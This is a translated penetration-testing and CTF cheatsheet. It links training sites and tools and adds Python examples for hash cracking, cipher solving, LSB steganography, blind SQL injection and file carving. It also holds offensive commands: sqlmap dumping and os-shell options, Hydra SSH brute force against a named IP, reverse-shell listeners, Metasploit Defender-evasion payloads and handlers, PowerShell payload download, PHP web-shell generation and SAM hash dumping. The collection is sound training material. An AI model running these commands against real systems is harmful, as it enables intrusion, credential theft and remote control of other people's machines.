Cyber Security General (Archive – Cheatsheet)

CYBER SECURITY GENERAL ARCHIVE


Write-ups from past CTFs

https://github.com/berkayyildi/CTF-WRITEUP
https://github.com/stmctf
http://www.halitalptekin.com/hacettepe-ctf.html
https://www.aucyberclub.org/cozumler/2017/02/17/cypmctfcozumleri.html
https://blog.crypttech.com/2017/05/2-geleneksel-stajyer-ctf-soru-ve_30.html
https://www.ismailkundakci(.)com/adeosecurity-iws17-ctf-cozumleri/
http://www.mucahittopal.com/dkhos-ctf-capture-the-flag-cozumlerim.html
http://www.omurfurkanulu.com/blog/konu/egitim/lostarctf/lostarctf2017.html

CTF helper tools: https://pentest.ws/

Vulnerable machine images:
https://www.vulnhub.com
https://www.hackthebox.eu

Online training machines: https://attackdefense.com

Training sites:
https://www.hellboundhackers.org
https://ctf101.org/
https://www.root-me.org/
More

Other bloggers:
https://www.mertsarica.com
https://canyoupwn.me/
http://www.meryemakdoğan.com
http://cyberjungles.com/
https://uceka.com
https://medium.com/mcoskuner
http://www.abdullahog.lu

CTF news: https://ctftime.org/ctfs

Cyber security news and tool sites:

https://null-byte.wonderhowto.com
https://thehackernews.com
https://www.kitploit.com
https://www.hackread(.)com
https://kalilinuxtutorials.com

Toolkit Collections:
https://0xsp.com/offensive/red-teaming-toolkit-collection

Useful tools:
file (identify what a file is from its magic bytes)
exiftool (extract metadata from image files)
strings (extract the printable strings inside a file)
Online Photoshop https://www.photopea.com/ (adjust image brightness etc.)
Online compiler https://coder.com/
Installing Atom on Kali (note: Atom was sunset in December 2022 and atom.io no longer serves downloads; the commands are kept for the record):


root@kali:~# apt-get install gvfs gvfs-common gvfs-daemons gvfs-libs gconf-service gconf2 gconf2-common gvfs-bin psmisc
root@kali:~# wget https://atom.io/download/deb -O atom-amd64.deb && dpkg -i atom-amd64.deb

String Manipulation – Encryption

Cyber Chef: https://gchq.github.io/CyberChef/

CAESAR Decode Detailed : https://cryptii.com/pipes/caesar-cipher

MD5 Crackers: https://hashtoolkit.com https://crackstation.net/ https://hashkiller.co.uk/Cracker/MD5

HASH IDENTIFY
https://www.onlinehashcrack.com/hash-identification.php
https://www.tunnelsup.com/hash-analyzer/
https://md5hashing.net/hash_type_checker/
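Added example (not from the original page): a Python dictionary cracker that does what the hash-identification sites and MD5 crackers above do, first guessing the algorithm from the digest length, then trying each word of a constructed mini wordlist with a few hashcat-style mangling rules. The wordlist, the rule set and the length table are assumptions; they stand in for rockyou.txt and a full identifier, and a 32-hex digest could equally be NTLM, which hashlib does not always provide.

```python
import hashlib
import re

# Constructed stand-in for rockyou.txt (assumption: not from the page).
WORDLIST = ["password", "letmein", "qwerty", "Summer2019", "admin"]

# Digest length in hex chars -> hashlib names to try. A 32-char hex digest can also be
# NTLM/MD4 (not available in every OpenSSL build); a 40-char one could be RIPEMD-160.
BY_LENGTH = {32: ["md5"], 40: ["sha1"], 56: ["sha224"],
             64: ["sha256"], 96: ["sha384"], 128: ["sha512"]}


def identify(digest):
    """Candidate algorithms for a hex digest, judged by length alone (like the online identifiers)."""
    digest = digest.strip()
    if not re.fullmatch(r"[0-9a-fA-F]+", digest):
        return []
    return BY_LENGTH.get(len(digest), [])


def hexdigest(algo, text):
    return hashlib.new(algo, text.encode()).hexdigest()


def mangle(word):
    """A few hashcat-style rules: as-is, capitalised, upper-cased, common suffixes."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!", "2019"):
        yield word + suffix


def crack(target, wordlist=WORDLIST):
    """Return (algorithm, plaintext) for an unsalted digest, or None if the wordlist misses."""
    target = target.strip().lower()
    for word in wordlist:
        for candidate in mangle(word):
            for algo in identify(target):
                if hexdigest(algo, candidate) == target:
                    return algo, candidate
    return None


if __name__ == "__main__":
    print(crack("5f4dcc3b5aa765d61d8327deb882cf99"))  # md5("password")
```

Salted or iterated hashes (bcrypt, sha512crypt) need the salt and the iteration count from the stored string; length-only identification tells you nothing about those, which is why john and hashcat parse the full hash format instead.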

XOR
http://strelitzia.net/wasXORdecoder/wasXORdecoder.html

VIGENERE
https://www.dcode.fr/vigenere-cipher
https://cryptii.com/vigenere-cipher

ROT – ROT 0-25
https://www.dcode.fr/rot-cipher
http://theblob.org/rot.cgi

Substitution Cipher:
https://www.quipqiup.com
http://substitution.webmasters.sk/simple-substitution-cipher.php
https://www.guballa.de/substitution-solver

Hex/Dec/Oct/ASCII Converter
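Added example, not part of the original cheatsheet: the Caesar/ROT, Vigenère and single-byte XOR operations the sites above perform, in Python, with a brute force over all ROT shifts and all 256 XOR keys that picks the candidate scoring highest on a small common-word test. The word list used for scoring is an assumption; a real solver would use letter frequencies or a dictionary.

```python
import re
import string

# Tiny "does it look like English" test: count whole tokens that are common words.
# The word set is an assumption; a real solver scores with letter frequencies or a dictionary.
COMMON_WORDS = {"the", "and", "is", "of", "to", "in", "at", "flag", "attack"}


def english_score(text):
    if not all(ch in string.printable for ch in text):
        return -1
    return sum(1 for tok in re.findall(r"[a-z]+", text.lower()) if tok in COMMON_WORDS)


def rot(text, n):
    """Caesar/ROT-n on letters only; n=13 is ROT13 and rot(text, -n) undoes rot(text, n)."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + n) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + n) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def rot_bruteforce(ciphertext):
    """Try all 26 shifts (what the ROT 0-25 sites do); return (shift, plaintext) with the best score."""
    candidates = [(n, rot(ciphertext, -n)) for n in range(26)]
    return max(candidates, key=lambda c: english_score(c[1]))


def vigenere(text, key, decrypt=False):
    """Vigenere with a letters-only key; non-letters pass through and do not advance the key."""
    shifts = [ord(k) - 97 for k in key.lower() if k.isalpha()]
    out, i = [], 0
    for ch in text:
        if ch.isalpha():
            s = shifts[i % len(shifts)]
            base = 65 if ch.isupper() else 97
            out.append(chr((ord(ch) - base + (-s if decrypt else s)) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def xor_single(data, key):
    return bytes(b ^ key for b in data)


def xor_bruteforce(data):
    """Single-byte XOR: try every key 0..255, keep the candidate that looks most like English."""
    best = (-1, None, None)
    for key in range(256):
        try:
            text = xor_single(data, key).decode("ascii")
        except UnicodeDecodeError:
            continue
        s = english_score(text)
        if s > best[0]:
            best = (s, key, text)
    return best[1], best[2]
```

For a multi-byte XOR key the same scoring works per key byte once the key length is known (Hamming distance between ciphertext blocks, or Kasiski examination as for Vigenère).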

Binary file editor tool online:
https://hexed.it/


— Steganography (Stego)—

Steghide (JPG/BMP/WAV): root@kali:~# steghide extract -sf picture.jpg (Source)

Steghide bruteforce (JPG/WAV): pip3 install stegcracker

ZSTEG (PNG & BMP): gem install zsteg

Image Steganography Lower Bits: https://incoherency.co.uk/image-steganography/#unhide

Steganography JPEG WAV AU: https://futureboy.us/stegano/decinput.html

Stegsolve JAR: a tool that can be used instead of Photoshop (Download)

Online ExifTool: http://metapicz.com/#landing

Simple tools not to forget: strings, binwalk, foremost, dcode.fr

WavSteg: Download

Outguess: an alternative to Steghide

Audio spectrum analysis:
Audacity or Sonic Visualiser (add a Spectrogram layer, mixed channels)

Original Image Difference Comparison : https://pequalsnp-team.github.io/writeups/SC2

Extracting frames from a video (mpg): https://stackoverflow.com/questions/10957412/fastest-way-to-extract-frames-using-ffmpeg
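Added example (my code, not the page's): least-significant-bit embedding and extraction on a constructed greyscale byte array, the technique the "lower bits" site and Stegsolve's bit-plane view target. Real images are read with PIL (Image.tobytes()) into exactly such a byte string; the 32-bit length prefix and the sequential byte order are assumptions about the layout, and a tool that embeds in a different order or channel will not be decoded by this extractor.

```python
def make_cover():
    """Constructed 8-bit greyscale cover: a 32x32 gradient as a flat byte string (stand-in for Image.tobytes())."""
    return bytes(range(256)) * 4


def embed_lsb(pixels, message):
    """Hide message in the least significant bit of successive pixel bytes, 32-bit length prefix first."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for payload")
    out = bytearray(pixels)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit   # each pixel value changes by at most 1
    return bytes(out)


def _read_bytes(bits, offset, count):
    out = bytearray()
    for b in range(count):
        value = 0
        for i in range(8):
            value = (value << 1) | bits[offset + b * 8 + i]
        out.append(value)
    return bytes(out)


def extract_lsb(pixels):
    """Inverse of embed_lsb; raises if the length prefix points past the image (nothing embedded this way)."""
    bits = [p & 1 for p in pixels]
    length = int.from_bytes(_read_bytes(bits, 0, 4), "big")
    if 32 + length * 8 > len(bits):
        raise ValueError("length prefix does not fit: no LSB payload in this layout")
    return _read_bytes(bits, 32, length)


def bit_plane(pixels, plane=0):
    """Isolate one bit plane as 0/255 bytes: the 'lower bits' view Stegsolve and the site above render."""
    return bytes(255 if (p >> plane) & 1 else 0 for p in pixels)
```

Viewing bit_plane(stego) of a real image is how you spot LSB payloads by eye: natural image noise in plane 0 looks random, while an embedded ASCII payload shows up as a structured band at the top-left because most ASCII bytes start with 0.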


Network packet analysis tools:

Wireshark

Airodump: root@kali:~# airodump-ng --uptime -r wireless.cap

Charles can also read HTTP requests.

Burp Suite must be run with JDK 11 for TLS 1.3!


Network scan: root@kali:~# netdiscover -r 192.168.1.0/24
Port scan: root@kali:~# nmap -sC -sV -v 192.168.1.123


SQLMAP usage:

root@kali:~# sqlmap -u "http://test.com/users.php?id=4" --dbs # list databases
root@kali:~# sqlmap -u "http://test.com/users.php?id=4" -D DatabaseAdi --tables # list tables
root@kali:~# sqlmap -u "http://test.com/users.php?id=4" -D DatabaseAdi -T Tabloadi --columns # list columns
root@kali:~# sqlmap -u "http://test.com/users.php?id=4" -D DatabaseAdi -T Tabloadi --dump # dump all column records
root@kali:~# sqlmap -u "http://test.com/users.php?id=4" -D DatabaseAdi -T Tabloadi -C user,pass --dump # dump the selected columns only

Level parameters: --level=5 --risk=3 , WAF bypass: --tamper=space2comment , DB type: --dbms=MySQL , Threads: --threads 5 , Get a shell: --os-shell , Non-interactive (accept defaults): --batch , Mobile user agent: --mobile , (Source)

Other parameters: --prefix="" , --technique=E

Database schema: root@kali:~# sqlmap -u "http://test.com/users.php?id=4" -D DatabaseAdi --schema

Scan from a RAW request file (Burp Suite output or Charles HTTP 1.1 RAW):

root@kali:~# sqlmap -r /file.txt -p "user" --dbs (Source)
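Added example, not from the page: what sqlmap's boolean-based blind technique (--technique=B) does by hand, against a constructed in-memory SQLite table standing in for test.com's users.php. The vulnerable handler concatenates id into the query; the oracle is only "did the page return a row"; the extractor recovers the admin password one character at a time with a binary search. The fixed handler beside it binds the parameter. Table name, rows and SQLite's unicode()/substr() functions are assumptions about the backend; on MySQL the payload would use ascii()/substring().

```python
import sqlite3


def build_db():
    """Constructed stand-in for the target's database (assumption: not the page's test.com)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, user TEXT, pass TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret"), (4, "berkay", "pass123")])
    return con


def users_php_vulnerable(con, id_param):
    """users.php?id=... with the parameter concatenated into the query: the bug sqlmap looks for."""
    sql = "SELECT user FROM users WHERE id=" + id_param
    return [row[0] for row in con.execute(sql)]


def users_php_fixed(con, id_param):
    """Same lookup with a bound parameter; id is cast to int, so '4 OR 1=1' is rejected, not executed."""
    return [row[0] for row in con.execute("SELECT user FROM users WHERE id=?", (int(id_param),))]


def blind_extract(page_returns_row, subquery, max_len=32):
    """Boolean-based blind extraction: learn a string one character at a time using only whether
    the page returned a row, with a binary search over the character code (7 requests per char)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # substr past the end gives '', unicode('') is NULL, so the comparison is never true
            if page_returns_row(f"4 AND unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # end of string reached
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    oracle = lambda payload: len(users_php_vulnerable(db, payload)) > 0
    print(blind_extract(oracle, "SELECT pass FROM users WHERE user='admin'"))
```

The id=4 prefix matters: it must select a row that exists, so that the page's "row / no row" behaviour reflects only the injected condition; sqlmap picks such a baseline automatically during detection.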


WordPress Scan Tool:

root@kali:~# wpscan --url 192.168.1.12 (scan)
root@kali:~# wpscan --url 192.168.1.123 --wordlist rockyou.txt --username admin  (bruteforce, old v2 syntax, deprecated)
root@kali:~# wpscan --url http://local.com -P /usr/share/wordlists/rockyou.txt -U admin -t 20 (bruteforce, current syntax; -t is --max-threads)

HYDRA SSH bruteforce (use ftp instead of ssh as the last argument for FTP): root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 185.126.179.211 -t 4 -V ssh
(More on HYDRA bruteforce)


Nikto Web Scanner: root@kali:~# nikto -h 192.168.1.123


Binwalk Extract All:

root@kali:~# binwalk --dd='.*' music.mp3

Binwalk just extract JPEGS: root@kali:~# binwalk system32.dll -D jpeg

Free proxies (concurrent connections limited): https://gimmeproxy.com/

Mobile DTMF Tones Detection:

http://dialabc.com/sound/detect/
http://www.dialabc.com/words/search/
http://www.phonespell.org/
Android App: https://play.google.com/store/apps/details?id=cz.muni.fi.jonny.dtmf
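Added example (not from the original page): decoding DTMF tones offline with the Goertzel algorithm, which is what the detection sites above do with an uploaded recording. The signal here is synthesised in code (two sines per key, 8 kHz, 100 ms frames); a real recording would be read from a WAV file into the same list of samples. The frame length and the power threshold are assumptions.

```python
import math

RATE = 8000                       # sample rate of the constructed signal (assumption)
LOW = [697, 770, 852, 941]        # DTMF row frequencies
HIGH = [1209, 1336, 1477, 1633]   # DTMF column frequencies
KEYPAD = ["123A", "456B", "789C", "*0#D"]


def synth(digit, n=800):
    """Constructed test tone: one DTMF digit, 100 ms at 8 kHz, two unit-amplitude sines."""
    row = next(r for r, keys in enumerate(KEYPAD) if digit in keys)
    col = KEYPAD[row].index(digit)
    f1, f2 = LOW[row], HIGH[col]
    return [math.sin(2 * math.pi * f1 * i / RATE) + math.sin(2 * math.pi * f2 * i / RATE)
            for i in range(n)]


def goertzel(samples, freq, rate=RATE):
    """Power at one frequency bin; cheaper than a full FFT when only the 8 DTMF bins matter."""
    n = len(samples)
    k = round(n * freq / rate)
    coeff = 2 * math.cos(2 * math.pi * k / n)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def detect(frame, threshold=1000.0):
    """Return the key whose row and column tones dominate, or '' if no tone is present."""
    row_power = {f: goertzel(frame, f) for f in LOW}
    col_power = {f: goertzel(frame, f) for f in HIGH}
    f_low = max(row_power, key=row_power.get)
    f_high = max(col_power, key=col_power.get)
    if row_power[f_low] < threshold or col_power[f_high] < threshold:
        return ""
    return KEYPAD[LOW.index(f_low)][HIGH.index(f_high)]


def decode(signal, frame=800):
    """Split a signal into 100 ms frames (one keypress each) and decode them."""
    return "".join(detect(signal[i:i + frame]) for i in range(0, len(signal), frame))
```

With 800 samples at 8 kHz each bin is 10 Hz wide, so every DTMF frequency lands within 5 Hz of its own bin and at least 7 bins from its neighbours; a real recording also needs silence gaps between keys, otherwise two presses of the same digit merge into one frame.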

APK ANALYSIS:

https://n0where.net/best-android-tools
https://securityonline.info/android-arsenal-dynamic-analysis-tools/
https://github.com/ashishb/android-security-awesome
https://github.com/ac-pm/Inspeckage

SandBox: https://github.com/Areizen/Android-Malware-Sandbox
Android Online Emulator: https://appetize.io

Android x86 Emulator: GenyMotion (Proxy Settings)


Frida usage, detailed walkthrough:

Frida examples: https://github.com/berkayyildi/Frida-Android-Hooking/


CeWL usage:
root@kali:~# cewl -w wordlist.txt -d 5 -m 7 www.sans.org

-w sets the file the wordlist is written to.
-d sets the depth, i.e. how deep CeWL spiders the site while collecting words.
-m sets the minimum word length in characters.

Creating a wordlist with crunch:

root@kali:~# crunch [minimum length] [maximum length] [charset / extra options]

root@kali:~# crunch 1 4 abc123 > wordlist.txt

-b: The maximum size of the wordlist (along with -o START)
-c: Numbers of lines in the wordlist (along with -o START)
-d: Limit the number of duplicate characters
-f: Specify a list of character sets from the charset.lst file
-o: Output the wordlist to a file
-s: Specify a particular string to begin the words with
-p: Print permutations without repeating characters (cannot be used with -s)
-z: compress the output wordlist file, accompanied by -o

With -p the given characters are shuffled to produce permutations without repeated letters (the specified password length is ignored) (for abc: bac, cab... 6 in total)

Wordlist from permutations of words: root@kali:~# crunch 4 5 -p car home plane

Wordlist from a predefined charset: root@kali:~# crunch 4 4 -f /usr/share/crunch/charset.lst lalpha-sv (see the file for the list of charsets)

Wordlist with a specific pattern:

 root@kali:~# crunch 10 10 -t @@@@@@0728

@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols
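Added example, not part of the page: a Python model of crunch's -t placeholders and -p permutations, useful for checking how many lines a pattern expands to before letting crunch fill the disk. The symbol class for ^ is an assumption approximating crunch's default; crunch itself also has -l to mark placeholder characters as literals.

```python
import itertools
import string

# Placeholder classes used by crunch -t; the symbol set is an assumption approximating crunch's default.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/",
}


def pattern_pools(pattern):
    """One candidate pool per position: a placeholder expands to its class, anything else is literal."""
    return [PLACEHOLDERS.get(ch, ch) for ch in pattern]


def expand_pattern(pattern):
    """Yield every word matching a crunch -t pattern, rightmost position varying fastest as crunch does."""
    for combo in itertools.product(*pattern_pools(pattern)):
        yield "".join(combo)


def count_pattern(pattern):
    """How many lines crunch would print for this pattern; check this before filling the disk."""
    n = 1
    for pool in pattern_pools(pattern):
        n *= len(pool)
    return n


def size_bytes(pattern):
    """Approximate output size: every line is the pattern length plus a newline."""
    return count_pattern(pattern) * (len(pattern) + 1)


def permute_words(words):
    """crunch -p behaviour: every ordering of the given words, none repeated (length arguments ignored)."""
    return ["".join(p) for p in itertools.permutations(words)]
```

The page's example `@@@@@@0728` is 26^6 = 308,915,776 lines, about 3.4 GB on disk; piping crunch straight into hashcat or john instead of -o avoids writing that file at all.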

Foremost tool (recovering deleted files):

root@kali:~# foremost -t doc,jpg,pdf,xls -i image.dd
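Added example serving both the binwalk commands above and the foremost command here: a header/footer carver in Python over a constructed "disk image" containing fake JPEG and PNG files. The signature table is trimmed to three types (an assumption; binwalk and foremost ship far larger ones) and the fake file bodies are constructed, not real image data.

```python
# Header/footer pairs for a few common types; same idea as binwalk's signature scan and foremost's
# configuration file, trimmed to three entries (assumption: not a complete table).
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
    "pdf": (b"%PDF-", b"%%EOF"),
}

# Constructed fake files and a constructed "disk image" containing them (not real image data).
JPG = b"\xff\xd8\xff\xe0" + b"JFIF-fake-body-" * 4 + b"\xff\xd9"
PNG = b"\x89PNG\r\n\x1a\n" + b"IHDR-fake-chunks-" * 4 + b"IEND\xaeB`\x82"
FILLER = b"garbage-between"
IMAGE = b"\x00" * 64 + JPG + FILLER + PNG + b"\xff" * 32


def carve(blob):
    """Return [(type, offset, data)] for every file found between a known header and its footer."""
    found = []
    for kind, (head, tail) in SIGNATURES.items():
        pos = 0
        while True:
            start = blob.find(head, pos)
            if start < 0:
                break
            end = blob.find(tail, start + len(head))
            if end < 0:
                break                      # header without footer: truncated file, skip it
            end += len(tail)
            found.append((kind, start, blob[start:end]))
            pos = end
    # Caveat: a footer sequence can occur inside compressed data (FFD9 inside a JPEG, %%EOF repeated
    # in an incrementally-updated PDF), so carved files may be cut short; validate them with `file`.
    return sorted(found, key=lambda f: f[1])


def carve_to_files(blob, outdir):
    """Write carved files to outdir named by offset, as foremost does; returns the written paths."""
    import os
    paths = []
    for kind, offset, data in carve(blob):
        path = os.path.join(outdir, f"{offset:08d}.{kind}")
        with open(path, "wb") as fh:
            fh.write(data)
        paths.append(path)
    return paths
```

This is also why `binwalk -D jpeg system32.dll` can report JPEGs inside a DLL: the scan is purely by byte signature, so resources, icons and false positives all match.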

PDF forensics: PDFStreamDumper

Software for opening forensic images: Forensic Image Pro v6 – AD1 etc. supported

Online GEEK Tools:

http://hackertyper.com
http://geektyper.com


Malware Analysis

Forensic Windows Evidence Collector: 
https://binalyze.com/products/irec-free/

Finding changed files on Windows: FolderChangesView

Process Hacker: https://processhacker.sourceforge.io/

Comodo Cleaning Essentials

Online malware analysis: https://app.any.run/

VMware Anti-AntiVM: https://github.com/hzqst/VmwareHardenedLoader

Forensic

Volatility GUI: https://www.osforensics.com/tools/volatility-workbench.html


RAR2JOHN & John:

root@kali:~# rar2john rarismi.rar > rarhashi.txt && john rarhashi.txt --wordlist=rockyou.txt

ZIP File Bruteforce:

root@kali:~# fcrackzip -u -D -p rockyou.txt rarismi.zip

Kali default wordlist directory: root@kali:~# cd /usr/share/wordlists/


Saving .so file with IDA:

Edit –> Patch Program –> Apply patches to input file

.so file Analysis:

Application used: snowman-v0.1.2-win-x64

Shellcode To exe

http://sandsprite.com/shellcode_2_exe.php

UPX UNPACK:

upx.exe -d -o calc_upx.exe calc.exe  (Walkthrough)

Javascript Deobfuscation:

http://jsnice.org

Detect It Easy is a Packer identifier:

http://ntinfo.biz/index.html

Twitter Secret Message:

http://holloway.co.nz/steg/

Linux find file: root@kali:~# find . -type f -exec grep -H 'search_term' {} \;

Hexdump 2 File:

root@kali:~# xxd -r 3.txt > dosyam


PHP Shell B374K

https://code.google.com/archive/p/b374k-shell/downloads

Weevely PHP Shell Generator

root@kali:~# weevely generate myshell.php


Listening with nc (catching a reverse shell):

root@kali:~# nc -lvp 4444

Upgrade a reverse shell to an interactive shell:

root@kali:~# nc -lvp 4444
// after the reverse shell connects, type this inside the shell (it runs on the target, not on Kali)
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
root@kali:~# stty raw -echo
root@kali:~# fg
// To finish, exit() out of python; after exiting do not forget to reset the terminal (reset)

Windows interactive PowerShell: exe and ps1 connection
https://github.com/antonioCoco/ConPtyShell

Windows Get All Powershell History

Windows PowerSploit

Dumping a blind HTTP request with curl: Google "http request dump online"

Reverse shell payloads in every language: https://alamot.github.io/reverse_shells/

Upgrade SSH to Meterpreter:

msfconsole
use scanner/ssh/ssh_login
use multi/manage/shell_to_meterpreter

DOCKER METASPLOIT:

docker run --rm -it \
       -p 4444:4444 -p 80:80 -p 8080:8080 \
       -p 443:443 -p 445:445 -p 8081:8081 \
       strm/metasploit

Interactive Shell:
stty raw -echo && cat <(echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'") - | nc -lvp 4444 (More Info)

Connecting with nc: root@kali:~# nc 192.168.1.100 80


Privilege Escalation Scripts:

https://github.com/rebootuser/LinEnum
https://github.com/PenturaLabs/Linux_Exploit_Suggester
http://www.securitysift.com/download/linuxprivchecker.py
https://github.com/pentestmonkey/unix-privesc-check
https://www.kitploit.com/2018/08/lynis-267-security-auditing-tool-for.html
https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/
SUID: https://pentestlab.blog/category/privilege-escalation/


Privilege Escalation Best Practices:

Worth reading:
Guide Linux Privilege Escalation

Pay attention to files with the SUID bit set; check whether we have permission to modify them.

If a SUID binary calls another program by bare name (something like system("time")), we can change PATH so that our own program runs instead of that one. (Example machine)

A suspicious SUID binary can be examined with ltrace (library calls) or strace (syscalls), or reverse engineered.

Check the crontabs: if we can edit a job that runs as root, we can become root. (Example machine)
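Added example, not from the page: a Python enumeration of the SUID and PATH-hijack checks described above, run against a constructed temp directory rather than the real filesystem. The fake binaries, the candidate command names and the strings heuristic are assumptions; on a real machine you would call find_suid('/') and writable_path_dirs(os.environ['PATH']).

```python
import os
import re
import stat
import tempfile


def find_suid(root):
    """Files under root with the set-uid bit: what `find / -perm -4000 -type f 2>/dev/null` lists."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def writable_path_dirs(path_env):
    """PATH entries an attacker can plant a binary in: writable, missing, or empty/'.' (current dir)."""
    out = []
    for entry in path_env.split(os.pathsep):
        if entry in ("", "."):
            out.append(entry or "(empty entry = cwd)")
        elif not os.path.exists(entry) or os.access(entry, os.W_OK):
            out.append(entry)
    return out


def bare_command_refs(binary_path, candidates=("time", "ps", "ls", "cat", "service")):
    """Heuristic for `strings suid_bin | grep`: printable strings that are exactly a bare command name,
    the sign that the program does system("time") rather than an absolute path and is PATH-hijackable."""
    with open(binary_path, "rb") as fh:
        data = fh.read()
    found = set(re.findall(rb"[ -~]{2,}", data))
    return [c for c in candidates if c.encode() in found]


def make_demo_tree():
    """Constructed fixture: a temp dir with one fake SUID binary referencing 'time' and one normal file."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    suid = os.path.join(root, "backup_tool")
    with open(suid, "wb") as fh:
        fh.write(b"\x7fELF\x00\x00fake\x00/bin/sh\x00time\x00")
    os.chmod(suid, 0o4755)
    normal = os.path.join(root, "normal_tool")
    with open(normal, "wb") as fh:
        fh.write(b"\x7fELF\x00\x00fake\x00/usr/bin/time\x00")
    os.chmod(normal, 0o755)
    return root, suid, normal
```

The bare-name check is only a hint: confirm with ltrace that the binary really calls system()/execvp() with that name, and remember that bash drops privileges when euid != uid unless invoked with -p, so the planted program should be a compiled binary or a script that does not rely on bash's SUID handling.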

SUID FTP Exploit


Hashcat:

https://www.kitploit.com/2018/08/hashcat-v421-worlds-fastest-and-most.html

Instagram Bruteforce:

https://github.com/thelinuxchoice/instashell

Eternalblue Scanner:

https://github.com/nsa/eternalblue-scanner

Free shell servers (for reverse shells etc.):

http://www.freeshellz.net/
https://www.xshellz.com/


Wifi Hacking:

The wifite tool automatically tries the various attacks against WEP, WPS and WPA2.

In the WPA handshake-capture method, once the .cap has been captured, convert it to hccapx at https://hashc.co.uk/cap2hccapx and crack it on Windows with hashcat using the GPU.

.\hashcat64.exe -m 2500 .\Berkay.hccapx .\rockyou.txt

(Note: hashcat 6.x deprecated -m 2500 and the hccapx format in favour of -m 22000 with the hc22000 format produced by hcxpcapngtool.)


—Cyber Intelligence (Siber İstihbarat) (Open Source Intelligence) (Osint)—

Virustotal, Github, Sosyal Medya, Google Maps, pastebin etc.

Reverse IP Lookup:
Search on Bing with the ip: operator (ip:x.x.x.x)
https://www.robtex.com
https://www.yougetsignal.com/tools/web-sites-on-web-server/
https://hackertarget.com/reverse-ip-lookup/
https://viewdns.info/reverseip/
http://reverseip.domaintools.com

DNS HISTORY: https://securitytrails.com

WEB HISTORY: https://archive.org/web/

Built With : https://builtwith.com/

Shodan, Censys, Immuniweb, Maltego, Pastebin, gitmemory.com, searchdns.netcraft.com, dnsdumpster.com, Virustotal, Sublist3r Script , Zoomeye

Google Dork: site:facebook.com
https://securitytrails.com/blog/google-hacking-techniques

IBM X-Force Exchange: https://exchange.xforce.ibmcloud.com/

The Harvester: https://github.com/laramies/theHarvester

Google Drive Search Dork: https://securitronlinux.com/debian-testing/google-search-terms-to-find-interesting-stuff-on-google-drive/

Daha Fazla Bilgi : https://securitytrails.com/blog/top-20-intel-tools

OPEN FTP LIST: http://www.mmnt.net

Archive: https://www.prismacsi(dot)com/acik-kaynak-istihbarati-osint/


Windows Enumeration CHEATSHEET:
Enumeration Cheat Sheet For Windows


Metasploit

Metasploit Global LHOST Set: setg lhost tun0

Creating a Metasploit reverse shell exe
use evasion/windows/windows_defender_exe
set PAYLOAD windows/meterpreter/reverse_tcp (set PAYLOAD windows/shell/reverse_tcp)
set LPORT 443
set LHOST tun0
exploit

Metasploit Handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp (set PAYLOAD windows/shell/reverse_tcp) (windows/x64/meterpreter/)
set LPORT 443
set LHOST tun0
exploit

Metasploit Shell to Meterpreter Session:
use post/multi/manage/shell_to_meterpreter
set session 1
exploit
sessions

Reverse Shell Payload Generator:
use multi/script/web_delivery
set payload
set target
set lhost

Windows Powershell Download:
powershell iwr http://172.16.1.66/berkay.exe -OutFile C:\Users\username\AppData\Local\Temp\berkay.exe

Meterpreter Windows Exploit Suggester:
use post/multi/recon/local_exploit_suggester


Reverse Shell List:
Get Windows Oneliner Reverse Shell
Windows Get and Execute Oneliners
Bash Perl ASP Python PHP Ruby Java nc Telnet Powershell VBS Socat RunDll32 etc. Reverse Shell
Fully Interactive Reverse Shell for Windows
POWERSHELL FRAMEWORK Nishang (Awesome Scripts)
Oneliner Linux reverse shell online (python perl nc sh)

Windows – Privilege Esc Awesome Doc:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

Passive Subdomain Finder Script: pdlist https://github.com/gnebbia/pdlist

Samba (SMB) Enum Port 139, 445:

Enumeration Tool : https://github.com/m8r0wn/nullinux
Enumeration Tool 2 : smbmap

Connecting to a Samba share (FTP-like client): smbclient //10.10.10.123/ShareName -U guest

Samba mount & mounting a VHD over Samba:
https://medium.com/@abali6980/mounting-vhd-files-in-kali-linux-through-remote-share-smb-1c4d37c22211

Reading hashes from the SAM file:

Required files: /Windows/System32/config/SYSTEM, /Windows/System32/config/SAM
root@kali:# samdump2 SYSTEM SAM

PWN:

Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space
